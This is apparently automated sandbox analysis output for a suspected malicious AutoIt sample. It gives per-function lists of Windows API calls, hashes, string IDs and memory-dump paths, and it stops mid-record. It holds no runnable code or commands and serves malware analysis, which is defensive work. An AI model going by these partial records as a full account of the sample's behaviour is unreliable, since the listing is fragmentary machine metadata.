                                          • Opcode Fuzzy Hash: b631ef66a2f4c7aff04e3de46666c7f489936d950a139adc7606ae60e9162ad4
                                          • Instruction Fuzzy Hash: A4811A71A00109EFCB04DF94D984EEEB7BAFF89315F204199E545BB250DB71AE05CBA0
                                          APIs
                                          • VariantInit.OLEAUT32(?), ref: 00E68928
                                          • CharUpperBuffW.USER32(?,?), ref: 00E68A37
                                          • VariantClear.OLEAUT32(?), ref: 00E68BAF
                                            • Part of subcall function 00E57804: VariantInit.OLEAUT32(00000000), ref: 00E57844
                                            • Part of subcall function 00E57804: VariantCopy.OLEAUT32(00000000,?), ref: 00E5784D
                                            • Part of subcall function 00E57804: VariantClear.OLEAUT32(00000000), ref: 00E57859
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Variant$ClearInit$BuffCharCopyUpper
                                          • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                          • API String ID: 4237274167-1221869570
                                          • Opcode ID: e1355ca7ac779fa42ebe92a736305a67caf28a0a4772bcd2cf39eab793851e33
                                          • Instruction ID: d14e4074a941c08c343982caa1d3d7316eaee96f664b6c93e7d0b0b0544ba4ee
                                          • Opcode Fuzzy Hash: e1355ca7ac779fa42ebe92a736305a67caf28a0a4772bcd2cf39eab793851e33
                                          • Instruction Fuzzy Hash: 1F91BD746083019FC710DF24D58096ABBE4EF88354F049A2EF99AAB361DB30E945CB62
                                          APIs
                                            • Part of subcall function 00E0FEC6: _wcscpy.LIBCMT ref: 00E0FEE9
                                          • _memset.LIBCMT ref: 00E53077
                                          • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00E530A6
                                          • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00E53159
                                          • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00E53187
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: ItemMenu$Info$Default_memset_wcscpy
                                          • String ID: 0
                                          • API String ID: 4152858687-4108050209
                                          • Opcode ID: 64bd32aaf0c5dd72238a9317e9ef38e0887652106ec19887d4a1a67cb00a2333
                                          • Instruction ID: e9038d1f11605a595357375aa0c94987ef418dbcd33a8f6dd856299999a8bf6c
                                          • Opcode Fuzzy Hash: 64bd32aaf0c5dd72238a9317e9ef38e0887652106ec19887d4a1a67cb00a2333
                                          • Instruction Fuzzy Hash: FE51DF326093009AD7259A38C945AABB7E4EF45395F042E2DFD95F3191DB70CE4887A2
                                          APIs
                                          • _memset.LIBCMT ref: 00E52CAF
                                          • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00E52CCB
                                          • DeleteMenu.USER32(?,00000007,00000000), ref: 00E52D11
                                          • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00EB6890,00000000), ref: 00E52D5A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Menu$Delete$InfoItem_memset
                                          • String ID: 0
                                          • API String ID: 1173514356-4108050209
                                          • Opcode ID: d4c6b29702ae848122172d1b2afa711a6e5f5f23766635646f7919ce2f152680
                                          • Instruction ID: ae721677559175a91486a6f68a6b32188765546fd2b6985706ffb333cf68e27d
                                          • Opcode Fuzzy Hash: d4c6b29702ae848122172d1b2afa711a6e5f5f23766635646f7919ce2f152680
                                          • Instruction Fuzzy Hash: 564191302043029FD724DF24C845B5ABBE8EF86325F144A5EFE65A72D1D770E908CBA2
                                          APIs
                                          • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00E6DAD9
                                            • Part of subcall function 00DF79AB: _memmove.LIBCMT ref: 00DF79F9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: BuffCharLower_memmove
                                          • String ID: cdecl$none$stdcall$winapi
                                          • API String ID: 3425801089-567219261
                                          • Opcode ID: 54f17f3fbb45bf5c44f7d2a1b1bc38274a266782ab56a80d6e21277624f12179
                                          • Instruction ID: 5a0d50aec4bde943ffad93ed138b8bab42426951c3194e0c0bdc6ef637ea71ed
                                          • Opcode Fuzzy Hash: 54f17f3fbb45bf5c44f7d2a1b1bc38274a266782ab56a80d6e21277624f12179
                                          • Instruction Fuzzy Hash: FA31F270A04609AFCF00EF54DC818FEB3B4FF05360B019A29E825BB6D5CB71A905CB90
                                          APIs
                                            • Part of subcall function 00DF7F41: _memmove.LIBCMT ref: 00DF7F82
                                            • Part of subcall function 00E4B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00E4B0E7
                                          • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00E493F6
                                          • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00E49409
                                          • SendMessageW.USER32(?,00000189,?,00000000), ref: 00E49439
                                            • Part of subcall function 00DF7D2C: _memmove.LIBCMT ref: 00DF7D66
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: MessageSend$_memmove$ClassName
                                          • String ID: ComboBox$ListBox
                                          • API String ID: 365058703-1403004172
                                          • Opcode ID: 3930d5d7047d8ee4a089420ec23a1bee184fbd3d383a01e21eea0da5375220a2
                                          • Instruction ID: 58125a96976d1f774ccae6b3d18ebfd46a2dfd8782b8e0ed875d3bb2c86dd26f
                                          • Opcode Fuzzy Hash: 3930d5d7047d8ee4a089420ec23a1bee184fbd3d383a01e21eea0da5375220a2
                                          • Instruction Fuzzy Hash: EB21E471900108AEDB14ABB4EC868FFB7B8DF45360B119119FA25B71E2DB355E4A9630
                                          APIs
                                            • Part of subcall function 00DF1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00DF1D73
                                            • Part of subcall function 00DF1D35: GetStockObject.GDI32(00000011), ref: 00DF1D87
                                            • Part of subcall function 00DF1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00DF1D91
                                          • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00E766D0
                                          • LoadLibraryW.KERNEL32(?), ref: 00E766D7
                                          • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00E766EC
                                          • DestroyWindow.USER32(?), ref: 00E766F4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                          • String ID: SysAnimate32
                                          • API String ID: 4146253029-1011021900
                                          • Opcode ID: 37e5e0da7e30efcd55d987084b5b7402bd043d8d4355e991951d4b94c6ec4019
                                          • Instruction ID: b47770cfbaaf0303d86737e264319d5d48480d6c68bc0bf1e6d405f4e6f80d1e
                                          • Opcode Fuzzy Hash: 37e5e0da7e30efcd55d987084b5b7402bd043d8d4355e991951d4b94c6ec4019
                                          • Instruction Fuzzy Hash: 35219271100605AFEF104FA4EC80EBB37ADEF5936CF50A629F919B6190D771DC919760
                                          APIs
                                          • GetStdHandle.KERNEL32(0000000C), ref: 00E5705E
                                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00E57091
                                          • GetStdHandle.KERNEL32(0000000C), ref: 00E570A3
                                          • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00E570DD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: CreateHandle$FilePipe
                                          • String ID: nul
                                          • API String ID: 4209266947-2873401336
                                          • Opcode ID: b4307d36af2a02e937e08e2040f61822a1f85330eac428cdd506c641b348b17c
                                          • Instruction ID: ee22ff83a3f4c0584fe6f86dd91aee6f8ebb3f977a9f77f208583bce5e088df6
                                          • Opcode Fuzzy Hash: b4307d36af2a02e937e08e2040f61822a1f85330eac428cdd506c641b348b17c
                                          • Instruction Fuzzy Hash: 18217F74604209ABDB209F29EC05A9A77E8AF44725F205A29FDE1E72D0D77098688B60
                                          APIs
                                          • GetStdHandle.KERNEL32(000000F6), ref: 00E5712B
                                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00E5715D
                                          • GetStdHandle.KERNEL32(000000F6), ref: 00E5716E
                                          • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00E571A8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: CreateHandle$FilePipe
                                          • String ID: nul
                                          • API String ID: 4209266947-2873401336
                                          • Opcode ID: f387a899238d0e3b56a48d61a2bd85685d4df404105b8f8cb855489d0432ec4f
                                          • Instruction ID: 11cc386f446a3e5f7688f4164b8b714abdf818718b113715e387519cdc004127
                                          • Opcode Fuzzy Hash: f387a899238d0e3b56a48d61a2bd85685d4df404105b8f8cb855489d0432ec4f
                                          • Instruction Fuzzy Hash: B521C1716097059BDB209F29AD04AAAB7E8AF45335F201E19FCE1F72D0D7709869CB60
                                          APIs
                                          • SetErrorMode.KERNEL32(00000001), ref: 00E5AEBF
                                          • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00E5AF13
                                          • __swprintf.LIBCMT ref: 00E5AF2C
                                          • SetErrorMode.KERNEL32(00000000,00000001,00000000,00E7F910), ref: 00E5AF6A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: ErrorMode$InformationVolume__swprintf
                                          • String ID: %lu
                                          • API String ID: 3164766367-685833217
                                          • Opcode ID: 22e448a0c583c93f322e60b04962d8b8d8b6b636ed228171573027e1566ce5ca
                                          • Instruction ID: e0e975a89fafdb007f66cc8c5ab8283fdd37fe91e09fcf81c8c07c5db6a707b0
                                          • Opcode Fuzzy Hash: 22e448a0c583c93f322e60b04962d8b8d8b6b636ed228171573027e1566ce5ca
                                          • Instruction Fuzzy Hash: 70217430A00209AFCB10DF65D985EAEBBF8EF49704B104079F909EB252DB71EA45DB21
                                          APIs
                                            • Part of subcall function 00DF7D2C: _memmove.LIBCMT ref: 00DF7D66
                                            • Part of subcall function 00E4A37C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00E4A399
                                            • Part of subcall function 00E4A37C: GetWindowThreadProcessId.USER32(?,00000000), ref: 00E4A3AC
                                            • Part of subcall function 00E4A37C: GetCurrentThreadId.KERNEL32 ref: 00E4A3B3
                                            • Part of subcall function 00E4A37C: AttachThreadInput.USER32(00000000), ref: 00E4A3BA
                                          • GetFocus.USER32 ref: 00E4A554
                                            • Part of subcall function 00E4A3C5: GetParent.USER32(?), ref: 00E4A3D3
                                          • GetClassNameW.USER32(?,?,00000100), ref: 00E4A59D
                                          • EnumChildWindows.USER32(?,00E4A615), ref: 00E4A5C5
                                          • __swprintf.LIBCMT ref: 00E4A5DF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                          • String ID: %s%d
                                          • API String ID: 1941087503-1110647743
                                          • Opcode ID: 331122d3112e9ed8b3a6c352e6e6338e8cf6d0deccbbb37340c49a637ae0d8dd
                                          • Instruction ID: 188894cde5db3f789acdb6e6eeb2c7d521b84ce04a72a46fd3ec294634e7448e
                                          • Opcode Fuzzy Hash: 331122d3112e9ed8b3a6c352e6e6338e8cf6d0deccbbb37340c49a637ae0d8dd
                                          • Instruction Fuzzy Hash: 0C119071640208ABDF10BF64EC85FFA37A8AF48710F0890B5FE0CBA152DA7059858B75
                                          APIs
                                          • CharUpperBuffW.USER32(?,?), ref: 00E52048
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: BuffCharUpper
                                          • String ID: APPEND$EXISTS$KEYS$REMOVE
                                          • API String ID: 3964851224-769500911
                                          • Opcode ID: 673eb95f394a3ef7dd730c0c4f14039f63f308145f9b82f6de1581f89176a710
                                          • Instruction ID: 7e25ad5c15a4730aedc43492c6f1a878b3bbc9b6a94550e7fb7a22a8bc2b5cb1
                                          • Opcode Fuzzy Hash: 673eb95f394a3ef7dd730c0c4f14039f63f308145f9b82f6de1581f89176a710
                                          • Instruction Fuzzy Hash: 51116D70901219DFCF00EFA4D8414FEB7B4FF6A304B109868D955BB292EB32A94ACB50
                                          APIs
                                          • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00E6EF1B
                                          • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00E6EF4B
                                          • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00E6F07E
                                          • CloseHandle.KERNEL32(?), ref: 00E6F0FF
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                          • String ID:
                                          • API String ID: 2364364464-0
                                          • Opcode ID: dc7a72908faa5e1933c0f39b7959e14bc9e60f4197de4a43f2b7a637f568c90d
                                          • Instruction ID: c9fb68e6e5f9d250ee7bb34f8f4a9217573f15aaae1e602fdb49cc64b6b46e88
                                          • Opcode Fuzzy Hash: dc7a72908faa5e1933c0f39b7959e14bc9e60f4197de4a43f2b7a637f568c90d
                                          • Instruction Fuzzy Hash: 67819371A443019FD720DF24D856F2AB7E5EF48710F05881DFA99EB392DB71AC408B61
                                          APIs
                                            • Part of subcall function 00DF7F41: _memmove.LIBCMT ref: 00DF7F82
                                            • Part of subcall function 00E710A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00E70038,?,?), ref: 00E710BC
                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E70388
                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00E703C7
                                          • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00E7040E
                                          • RegCloseKey.ADVAPI32(?,?), ref: 00E7043A
                                          • RegCloseKey.ADVAPI32(00000000), ref: 00E70447
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                          • String ID:
                                          • API String ID: 3440857362-0
                                          • Opcode ID: a0285144ec7ee9bbaa66b4e931829cff27408ee65338dba402a43d8bd722943a
                                          • Instruction ID: e96b688b0d6cfa4a250246add4b0ecef6813897c1bafad3a6fe6822e366f6803
                                          • Opcode Fuzzy Hash: a0285144ec7ee9bbaa66b4e931829cff27408ee65338dba402a43d8bd722943a
                                          • Instruction Fuzzy Hash: 21512C71208204EFD704EF64D881E6EB7E8FF84314F04991DF699A7291DB30E905DB62
                                          APIs
                                          • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00E5E88A
                                          • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00E5E8B3
                                          • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00E5E8F2
                                            • Part of subcall function 00DF9997: __itow.LIBCMT ref: 00DF99C2
                                            • Part of subcall function 00DF9997: __swprintf.LIBCMT ref: 00DF9A0C
                                          • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00E5E917
                                          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00E5E91F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                          • String ID:
                                          • API String ID: 1389676194-0
                                          • Opcode ID: b2a743aa5673a8c31fabdfb724f6af50c124767820787a88b844045b01911bbc
                                          • Instruction ID: e95b410d6ed868c0df7c4061f002a63a733a8e8f1b977e306028cf1962f33fe1
                                          • Opcode Fuzzy Hash: b2a743aa5673a8c31fabdfb724f6af50c124767820787a88b844045b01911bbc
                                          • Instruction Fuzzy Hash: 3C512A35A00209DFCF05EF64C991AAEBBF5EF08314B158499E909AB362CB31ED55DF60
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b0f5629842df1f1b4e03f9407559dc42da91d04f2c23fc9fcd66f0592989000a
                                          • Instruction ID: ff3362116bfb12b02342a116d1267ed9adcbdb3c8215a4a1baf82229e4d548c7
                                          • Opcode Fuzzy Hash: b0f5629842df1f1b4e03f9407559dc42da91d04f2c23fc9fcd66f0592989000a
                                          • Instruction Fuzzy Hash: FB41CF35900204BFD724DF28CC88BADBBA5EB89310F189275E96DB72E1D770AD419A51
                                          APIs
                                          • GetCursorPos.USER32(?), ref: 00DF2357
                                          • ScreenToClient.USER32(00EB67B0,?), ref: 00DF2374
                                          • GetAsyncKeyState.USER32(00000001), ref: 00DF2399
                                          • GetAsyncKeyState.USER32(00000002), ref: 00DF23A7
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: AsyncState$ClientCursorScreen
                                          • String ID:
                                          • API String ID: 4210589936-0
                                          • Opcode ID: 61467f23d2de810d7893af9d00f7dc9f1a3b527596378ad1562dc9ee51cf2458
                                          • Instruction ID: a138010acb2991596af69de9fb37702c1aef3d9beccaad8bcc588145802dde68
                                          • Opcode Fuzzy Hash: 61467f23d2de810d7893af9d00f7dc9f1a3b527596378ad1562dc9ee51cf2458
                                          • Instruction Fuzzy Hash: 5E419071504529FBCF159FA4DC44AFDBBB4FB05364F208319F928A62A0CB309994DBA1
                                          APIs
                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E4695D
                                          • TranslateAcceleratorW.USER32(?,?,?), ref: 00E469A9
                                          • TranslateMessage.USER32(?), ref: 00E469D2
                                          • DispatchMessageW.USER32(?), ref: 00E469DC
                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E469EB
